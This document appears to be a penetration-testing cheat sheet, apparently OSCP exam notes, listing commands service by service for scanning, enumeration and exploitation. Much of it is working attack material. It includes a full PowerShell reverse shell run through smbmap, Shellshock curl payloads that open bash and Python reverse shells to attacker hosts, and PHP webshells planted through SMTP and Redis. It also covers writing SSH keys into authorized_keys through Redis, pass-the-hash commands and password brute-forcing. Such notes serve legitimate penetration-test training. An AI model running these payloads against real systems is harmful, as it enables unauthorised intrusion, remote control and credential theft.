Network
nmap -sn $iprange -oG - | grep Up | cut -d' ' -f2 > network.txt
TCP Port scanner script I use.
wget https://raw.githubusercontent.com/rowbot1/portscanner/main/portscanner.sh
nmap -Pn -sC -sV -oA all -vv -p- $ip
When you're getting no where with the TCP ports - try UDP ports. Easily forgotten about!
nmap -Pn -sU --top-ports 100 -oA udp -vv $ip
locate .nse | grep ftp
nmap --script-help ftp-anon
uniscan -u $ip -qweds
nmap -T4 -n -sC -sV -p- -oN nmap-versions --script='*vuln*' [ip]
Unicornscan supports asynchronous scans, speeding port scans on all 65535 ports. Nmap has powerful features that unicornscan does not have. With onetwopunch, unicornscan is used first to identify open ports, and then those ports are passed to nmap to perform further enumeration.
./onetwopunch.sh -t targets.txt -i tun0 -n '-T4 -n -sC -sV -oN nmap-versions --script=*vuln*'
NSE scripts that scans for vulnerabilities are at ls -l /usr/share/nmap/scripts/*vuln*.
nmap -p 80 --script=all $ip - Scan a target using all NSE scripts. May take an hour to complete.nmap -p 80 --script=*vuln* $ip - Scan a target using all NSE vuln scripts.nmap -p 80 --script=http*vuln* $ip - Scan a target using all HTTP vulns NSE scripts.nmap -p 21 --script=ftp-anon $ip/24 - Scan entire network for FTP servers that allow anonymous access.nmap -p 80 --script=http-vuln-cve2010-2861 $ip/24 - Scan entire network for a directory traversal vulnerability. It can even retrieve admin's password hash.
searchsploit --exclude=dos -t apache 2.2.3
msfconsole; > search apache 2.2.3
Find name servers
host -t ns $ip
fierce -dns $domain
Find email servers
host -t mx $ip
Subdomain bruteforcing
for ip in $(cat list.txt); do host $ip.$website; done
Reverse dns lookup bruteforcing
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"
When initialising a zone transfer, the attacker will first need to know the name of the zone which they are targeting and then specify the IP address of the DNS server to perform the zone transfer against.
Below is a zone transfer against an open DNS server. You can use either of the commands below:
dig <target domain> @<dns server> axfr
host -l <target domain> <dns server>
dig @[DNS SERVER HERE] axfr [DOMAIN NAME HERE]
The ‘@’ symbol is used to specify the target DNS server
host -l $ip ns1.$ip
dnsrecon -d $ip -t axfr
Finds nameservers for a given domain
host -t ns $ip| cut -d " " -f 4 #
dnsenum $ip
Nmap zone transfer scan
nmap $ip --script=dns-zone-transfer -p 53
Finds the domain names for a host.
whois $ip
Find the IP and authoritative servers.
nslookup $ip
Finds miss configure DNS entries.
host -t ns $ip
TheHarvester finds subdomains in google, bing, etc
python theHarvester.py -l 500 -b all -d $ip
Server Message Block (SMB) Protocol is a network file sharing protocol, and as implemented in Microsoft Windows
Samba has provided secure, stable and fast file and print services for all clients using the SMB/CIFS protocol, such as all versions of DOS and Windows, OS/2, Linux and many others
SMB Version | Windows version |
CIFS | Microsoft Windows NT 4.0 |
SMB 1.0 | Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2 |
SMB 2.0 | Windows Vista & Windows Server 2008 |
SMB 2.1 | Windows 7 and Windows Server 2008 R2 |
SMB 3.0 | Windows 8 and Windows Server 2012 |
SMB 3.0.2 | Windows 8.1 and Windows Server 2012 R2 |
SMB 3.1.1 | Windows 10 and Windows Server 2016 |
netbios-ns 137/tcp # NETBIOS Name Servicenetbios-ns 137/udpnetbios-dgm 138/tcp # NETBIOS Datagram Servicenetbios-dgm 138/udpnetbios-ssn 139/tcp # NETBIOS session servicenetbios-ssn 139/udpmicrosoft-ds 445/tcp # if you are using Active Directory
Enumerate Hostname -
nmblookup -A $ipList Shares
smbmap -H $ipecho exit | smbclient -L \\\\$ipnmap --script smb-enum-shares -p 139,445 $ip
Check Null Sessions
smbmap -H $iprpcclient -U "" -N $ipsmbclient \\\\$ip\\[share name]
Check for Vulnerabilities -
nmap --script smb-vuln* -p 139,445 $ipOverall Scan -
enum4linux -a $ipManual Inspection
smbver.sh $ip (port)
Get a shell with smbmap
smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
Quick script to check for vulns
https://github.com/rowbot1/OSCP-note/blob/master/ENUMERATION/SMB/SMB-check-vulns.rb
mblookup — NetBIOS over TCP/IP client used to lookup NetBIOS names
SMB NetBIOS service listens on TCP ports 139 and 445, as well as several UDP ports.
nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
nbtscan -r 192.168.1.0/24
Vulnerable SMB Versions
Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by defaultWindows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created defaultMost Samba (Unix) servers
List of SMB versions and corresponding Windows versions:
SMB1 – Windows 2000, XP and Windows 2003.SMB2 – Windows Vista SP1 and Windows 2008SMB2.1 – Windows 7 and Windows 2008 R2SMB3 – Windows 8 and Windows 2012.
Empty LM and NTLM hashes:
Empty LM Hash: aad3b435b51404eeaad3b435b51404eeEmpty NT Hash: 31d6cfe0d16ae931b73c59d7e0c089c0
rpcclient
Manually probe a SMB server
rpcclient -U '' $ipPassword:rpcclient $> srvinfo # operating system versionrpcclient $> netshareenumall # enumerate all shares and its pathsrpcclient $> enumdomusers # enumerate usernames defined on the serverrpcclient $> getdompwinfo # smb password policy configured on the server
Apparently the rpcclient version in OffSec VM does not work well with creating null sessions. A downgrade to samba-4.5.15 is required: https://forums.offensive-security.com/showthread.php?12943-Found-solution-to-enum4linux-rpcclient-problem-NT_STATUS_INVALID_PARAMETER&highlight=NT_STATUS_INVALID_PARAMETER Place the export commands into a script and source it before using rpcclient to use the downgraded version, or place it in bashrc. NOTE, once downgraded, pth-winexe doesn't seem to work.
enum4linux
Wrapper around smb programs like rpcclient to automate enumerating an SMB server. Produces tons of results when a null session is successful. NOTE: Make sure to downgrade rpcclient before using.
enum4linux -a $ipenum4linux -u 'guest' -p '' -a $ip
CrackMapExec
Works perfectly, list shares and permissions, enum users, disks, code execute and run modules like mimikatz. Hashes work. Also will tell you exact version of Windows
crackmapexec -u 'guest' -p '' --shares $ipcrackmapexec -u 'guest' -p '' --rid-brute 4000 $ipcrackmapexec -u 'guest' -p '' --users $ipcrackmapexec smb 192.168.1.0/24 -u Administrator -p [email protected]crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949Bcrackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz 192.168.1.0/24crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ipcrackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution
Also will tell you exact version of windows:
smbmap
Works well for listing and downloading files, and listing shares and permissions. Hashes work. Code execution doesn't work.
smbmap -u '' -p '' -H $ip # similar to crackmapexec --sharessmbmap -u guest -p '' -H $ipsmbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ipsmbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dirsmbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursivelysmbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt worksmbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work
Ippsec using this tool https://www.youtube.com/watch?v=jUc1J31DNdw&t=445s
generally works a bit better than enum4linux as it enum4linux tends to error out a bit
downloads to the /usr/share/smbmap directory
smb: \> RECURSE ONsmb: \> PROMPT OFFsmb: \> mget *
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q #downloads a file in quiet mode
smbmap -R $sharename -H $ip #Recursively list dirs, and files
smbmap -H $ip
default port it checks is 445, use -P 139 to point it at that port if 445 fails
Access SMB shares interactively, seems to work with anonymous access. Hashes don't work.
smbclient //$ip/wwwrootsmbclient //$ip/C$ WIN20082017 -U Administratorsmbclient //$ip/C$ A433F6C2B0D8BB92D7288ECFFACFC7CD -U Administrator --pw-nt-hash # make sure to only use the NT portion of the hash
WARNING, be careful when using the get command to download absolute path files from the remote system. Eg. get /etc/passwd will download the passwd file and overwrite YOUR /etc/passwd. Use get /etc/passwd /tmp/passwd instead.
To download recursively:
# Within smbclient, download everything recursively:mask ""recurse ONprompt OFFcd 'path\to\remote\dir'lcd '~/path/to/download/to/'mget *
pth-winexe
Works great sometimes. Can open a windows cmd shell.
pth-winexe -U administrator%WIN20082017 //$ipcmd # using a plaintext passwordpth-winexe -U Administrator%A433F6C2B0D8BB92D7288ECFFACFC7CD //$ipcmd # ntlm hash encrypted with https://www.browserling.com/tools/ntlm-hashpth-winexe -U domain/user%A433F6C2B0D8BB92D7288ECFFACFC7CD //$ipcmd # domain userpth-winexe -U Administrator%8F49412C8D29DF02FB62879E33FBB745:A433F6C2B0D8BB92D7288ECFFACFC7CD //$ip cmd # lm+ntlm hash encrypted with https://asecuritysite.com/encryption/lmhashpth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:A433F6C2B0D8BB92D7288ECFFACFC7CD //$ip cmd # ntlm hash + empty lm hash# orexport SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896pth-winexe -U Administrator% //$ip cmd
#!/bin/bash#SMB Enumeration using nmap#(c) Mike Digital Offensiveif [ -z "$1" ]thenecho "Error please provide host to enumerate"exitelsenmap -script=smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $1fi
#!/bin/sh#Author: rewardone#Description:# Requires root or enough permissions to use tcpdump# Will listen for the first 7 packets of a null login# and grab the SMB Version#Notes:# Will sometimes not capture or will print multiple# lines. May need to run a second time for success.if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fiif [ ! -z $2 ]; then rport=$2; else rport=139; fitcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/nullecho "" && sleep .1
nmblookup -A $ip
enum4linux -a $ip
Used to enumerate data from Windows and Samba hosts and is a wrapper for smbclient, rpcclient, net and nmblookup
Look for users, groups, shares, workgroup/domains and password policies
list smb nmap scripts
locate .nse | grep smb
nmap -A $ip -p139
then google to see if version is vulnerable
SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipenameSAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename
medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbntnmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through null sessions and the SID to RID enum. If you specify a password file, it will automatically attempt to brute force the user accounts when its finished enumerating.
https://tools.kali.org/maintaining-access/ridenum
A null SMB session can be used to gather passwords and useful information from SMB 1 by looking in shares that are not password protected for interesting files. Windows NT/2000 XP default settings allow this. Windows 2003/XP SP2 SMB this behaviour is disabled.
nbtscan -r $ip
msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run
MultiExploit
msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run
ls -ls /usr/share/nmap/scripts/smb*
Quick enum:
nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip
Quick vuln scan:
nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip
Full enum and vuln scanning:
nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
Full enum & vuln scan:
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip
Mount:
smbclient //$ip/share -U username
smblclient -N -L \\$ip
Anonymous mount:
smbclient //$ip/share # hit enter with blank password
Exploits a critical vulnerability in the SMBv1 protocol
Worth testing Eternal blue - you might get lucky although (the system should be patched to fix this)
Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016
nmap -p 445 $ip --script=smb-vuln-ms17-010
Bruteforce
hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb
Any metasploit exploit through Netbios over TCP in 139, you need to set:
set SMBDirect false
Show all mounts
showmount -e $ip
Mount a NFS share
mount $ip:/vol/share /mnt/nfs
Use nfspy to mount a share. Will get around permission errors
nfspysh -o server=$ip:/home/vulnix/
nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
nmap -sV -Pn -vv -script=mysql* $ip -p 3306
sqlmap -u 'http://$ip/login-off.asp' --method POST --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all
If Mysql is running as root and you have access, you can run commands:
mysql> select do_system('id');mysql> \! sh
msf > use auxiliary/scanner/mssql/mssql_pingnmap -sU --script=ms-sql-info $ip
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf > use exploit/windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
# [email protected]:~/dirsearch# cat ../.freetds.conf[someserver]host = $ipport = 1433tds version = 8.0user=sa[email protected]:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME
Used to send mail
Always do users enumeration
Mail is stored (in linux) in /var/log/mail/username. If you have LFI maybe you can connect to mail server and input webshell.
telnet $ip 25 EHLO rowbot MAIL FROM:[email protected] RCPT TO:$usernamehere DATA Subject: shell <?php system($_GET['cmd']); ?> . quit
symfonos:1 box
Completed machine with the above vulnerability: Symfonos:1
Commands https://serversmtp.com/smtp-commands/
HELOIt’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.EHLOAn alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.MAIL FROMWith this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.RCPT TOIt identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.SIZEThis SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.DATAWith the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.VRFYThe server is asked to verify whether a particular email address or username actually exists.TURNThis command is used to invert roles between the client and the server, without the need to run a new connaction.AUTHWith the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.RSETIt communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).EXPNThis SMTP command asks for a confirmation about the identification of a mailing list.HELPIt’s a client’s request for some information that can be useful for the a successful transfer of the email.QUITIt terminates the SMTP conversation.
for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ipsmtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ipsmtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -t $ip > smtpuserenumthen grep exists
use auxiliary/scanner/smtp/smtp_enum
Python script
#!/usr/bin/pythonimport socketimport sysif len(sys.argv) != 2:print "Usage: vrfy.py <username>"sys.exit(0)# Create a Sockets = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# Connect to the Serverconnect = s.connect(('192.168.1.234',25))# Receive the bannerbanner = s.recv(1024)print banner# VRFY a users.send('VRFY ' + sys.argv[1] + '\r\n')result = s.recv(1024)print result# Close the sockets.close()
Command to check if a user exists
VRFY root
Command to ask the server if a user belongs to a mailing list
EXPN root
Enumeration and vuln scanning:
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
use auxiliary/scanner/smtp/smtp_enum
telnet $ip 25EHLO rootMAIL FROM:[email protected]RCPT TO:[email protected]DATASubject: Testing open mail relay.Testing SMTP open mail relay. Have a nice day..QUIT
rpcinfo -p $ip
Get a list of .exe's that are using either TCP UDP HTTP and SMB via named pipes
rpcdump.py $ip | grep .exe | awk '{print $2}'
nmap $ip --script=msrpc-enum
msf > use exploit/windows/dcerpc/ms03_026_dcom
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
If anonymous login or any other login is allowed but you can't get Filezilla to open it. Play about with the connection settings, ACTIVE\PASSIVE\AUTO.
hydra -l user -P /usr/share/john/password.lst ftp://$ip:21
msfconsole -q msf> search type:auxiliary login: msf> use auxiliary/scanner/ftp/ftp_login
nmap --script=ftp-* -p 21 $ip
If unauthenticated access is allowed with write permissions you can upload a shell:
tftp $iptftp> ls?Invalid commandtftp> verboseVerbose mode on.tftp> put shell.phpSent 3605 bytes in 0.0 seconds [inf bits/sec]
nmap -sU -p 69 --script tftp-enum.nse $ip
or
use auxiliary/scanner/tftp/tftpbrute
connecting/interacting:
tftp $ip
tftp> put payload.exe
tftp> get file.txt
use auxiliary/scanner/ssh/ssh_enumusersset user_file /usr/share/wordlists/metasploit/unix_users.txtorset user_file /usr/share/seclists/Usernames/Names/names.txtrun
python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip
If you see the following message, it likely means that scp
PTY allocation request failed on channel 0
hydra -v -V -l root -P password-file.txt $ip ssh
hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh
You can use -w to slow down
openssl s_client -connect $ip:443
nmap --script ssl-enum-ciphers -p 443 $ip
Look for unsafe ciphers such as Triple-DES and Blowfish
Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...
enumerate Community strings
./onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.11.1.73
Community string too long If you see this download onesixtyone from Github and run it there
snmp-check -t $ip -c public
use nmap to enumerate info
nmap -sU -p161 --script "snmp-*" $ip
apt install snmp-mibs-downloader #translates MIBs into readable format
for community in public private manager; do snmpwalk -c $community -v1 $ip; donesnmpwalk -c public -v1 $ipsnmpenum $ip public windows.txt
Less noisy:
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25
Based on UDP, stateless and susceptible to UDP spoofing
nmap -sU --open -p 16110.1.1.1-254 -oG out.txt
snmpwalk -c public -v1 10.1.1.1 # we need to know that there is a community called publicsnmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows userssnmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip
telnet $ip 110USER [email protected]$ipPASS adminlistretr 1
https://touhidshaikh.com/blog/?p=914
finger @$ipif there is no user logged in this will show no username
finger [email protected]$ip
The finger command is very useful for checking users on target but it’s painful if brute-forced for a username.
use auxiliary/scanner/finger/finger_usersset rhosts $ipset users_filerun
cd /tmp/wget http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gztar -xvf finger-user-enum-1.0.tar.gzcd finger-user-enum-1.0perl finger-user-enum.pl -t 10.22.1.11 -U /tmp/rockyou-top1000.txt
Install RDP nmap scripts
https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/amp/
nmap -p 3389 --script rdp-ntlm-info $ip
ncrack -vv --user administrator -P password-file.txt rdp://$ip
hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Test MS14-068
First, the web server on the server broadcasts, including a simple PHP code and create a back door, which will help us to execute commands on the server.
CONFIG SET dir /var/www/html/CONFIG SET dbfilename shell.phpCONFIG GET dbfilename1) "dbfilename"2) "shell.php"SET cmd "<?php system($_GET['cmd']); ?>"OKBGSAVE
which can be accessed using
http://$ip/shell.php?cmd=whoamiwww-data
Second, file type found in the users home directory because it is our right and remote SSH access with a key instead of using the password used to connect to create key, they may be directly un-encrypted user rights that provide access to the system.
1: ssh-keygen -t rsa2:3: (echo -e "\n"; cat id_rsa.pub; echo -e "\n") > auth_key4:5: cat auth_key | redis-cli -h hostname -x set crackit6: redis-cli -h hostname7:8: config set dir /root/.ssh/9: config get dir10: config set dbfilename "authorized_keys"11: save12:13: config set dir /home/user/.ssh/14: save15:16: config set dir /home/admin/.ssh/17:18: ssh [email protected] -p 1322 -i id_rsa
1 - He has given parameters in line with a 2048-bit RSA key pair is generated. We can give it a password when we log in
3 - The public key of his own and to receive the new line last line auth_key name we are writing a new file. We will upload this file to the target machine via the Redis server.
5 and 6. data from the key input in the standard line that we say we do, and then take the memory contents auth_key entry Redis server.
8, 9, 10, 11 in which the location of the file content to be installed in the line number, which is stated to be added to the bottom of the file. SAVE transactions made by the commands are processed on the server side to make it happen.
13 and 16 lines in the root of the same process that we have done for other users in order to gain access with the privileges they also inside the ssh folder in the main folder authorized_keys are doing the same procedure for writing to file.
ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"
Find emails in google, bing, pgp etc
theharvester -d $ip -b google
Contact information for the domains they host
whois $ip
Find emails and employee name with Recon-ng:
recon-ng; use module; set DOMAIN $ip; run;recon/contacts/gather/http/api/whois_pocs
Find xss published ad xssed.co
recon/hosts/enum/http/web/xssed
Find subdomain
recon/hosts/gather/http/web/google_site
Finds IPs close to the domain and possible new domains
recon/hosts/gather/http/web/ip_neighbor
Google search
site:xxx -site:www.xxx
filetype: look for specific documents, pdf, docx, etc..
inurl
intitle
Others https://www.exploit-db.com/google-hacking-database/
OpenVAS
Powerful vulnerability scanner with thousands of scan checks. Setup:
openvas-setup; openvas-adduser; gsd
The following tool will test it.
git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose; ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose
You can also:
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80
curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status
curl -H "UserAgent: () { :; }; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.123\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" http://$ip/cgi-bin/test.sh
Shellshock over SSH:
ssh [email protected]$ip '() { :;}; /bin/bash'
Exploit shellshock via curl, use -k switch to force curl to bypass any SSL warnings. Replace the bash command with anything.
curl http://192.168.123.123/path/to/cgi- bin/name_of_vuln_cgi -H "custom:() { ignored; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1 "
Test web server
sslscan $ip:443
Vulnerable to msf exploit(ms10_002_aurora)
- sshuttle -r [email protected]$ip 10.10.10.0/24
Simplest type of traffic redirection, consists on accepting traffic from one address and port port and redirecting it to another address and port.
It can be useful to bypass address and port based filters. Rinetd is a linux tool to do it.
Creates an encrypted tunnel through two machines and have traffic redirected to a final host and port, similar to port forwarding This is useful when you are trying to connect from your machine to a destination using a gateway. The syntax is:
ssh gateway_host -L local_port:remote_host:remote_port
You can later create a SSH session to the local port and have and SSH tunneled to destination:
ssh hop_machine -L 31337:banned_machine:22ssh -p 31337 localhost
It creates a tunnel from the target machine to your local machine, which allows connecting to an arbitrary port on the target. Useful if the target is in a non-routable network from your local machine. This is useful when you are trying to connect to a host, behind a firewall that blocks incoming connections. This technique works as the previous one, but the connection is started from the gateway. The syntax is:
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Allows to create a tunnel from the target to your machine, and have the traffic routed to any host through target. You can configure a local port to forward traffic to multiple destinations passing through a single host. It is similar to local port forwarding but allows multiple destinations. It uses the SOCKS protocol. The syntax is:
ssh -D local_port remote_add
The connection of the previous command is established at port 22 of remote addr.
1. drop 3proxy.exe
2. Set up a config file:
allow *_internal IP_SAME_NETWORKexternal IP_OTHER_NETWORKsocks -p1081
3. Add to /etc/proxychains.conf:
socks4 IP_SAME_NETWORK 1081
4. Scan:
proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5
Pivoting through two different networks:
First, create a dynamic port forwarding through the first network:
ssh -f -N -D 9050 [email protected]
Edit /etc/proxychains.conf and add as default gateway:
socks4 127.0.0.1 9050
Use the proxy to create a second dynamic port forward to the second network:
proxychains ssh -f -N -D 10050 [email protected] -p 22
Edit again /etc/proxychains.conf and add as default gateway:
socks4 127.0.0.1 10050
You can now use proxychains to pivot to the target network:
proxychains nmap -sTV -n -PN 10.1.2.1 -254
- http://www.cvedetails.com/https://www.exploit-db.com/
- /usr/share/seclists//usr/share/wordlist//usr/share/metasploit-framework/data/wordlists/
Minimal web server
- for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done
Protocols
http://http://connect://sock4://sock5://
